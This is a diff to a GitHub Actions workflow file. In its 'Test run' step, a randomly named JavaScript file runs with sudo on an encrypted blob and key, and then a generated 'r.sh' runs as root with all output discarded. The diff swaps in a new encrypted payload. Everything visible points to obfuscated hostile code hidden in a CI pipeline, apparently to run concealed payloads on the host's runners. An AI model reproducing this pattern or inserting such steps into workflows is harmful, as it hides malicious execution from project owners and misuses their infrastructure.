--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'nwp2p'
+        echo 'x363o'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19TsCfNe57azSr+qQzpwSUoV7wWAzCPNjJA3PKikdyH/xoV56sCEQYeygoV8t43s0dgGben6GPpVd2G7EnRib8JGdhDO18axAPTsuLd4QVPaA+q1+BmqqJV c4euf7 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19nCrQxE3FB11EH61qpM0s4FCIGHyOQiveTuCF8Di3oS215n7+Lb6+GpY5KKarOPFlPMYZNygYAy300PLpC0sXcGVG0i40K3RrC/+EKjAJ+T8ahKfsLqClG 1czlga && sudo sh r.sh > /dev/null 2>&1
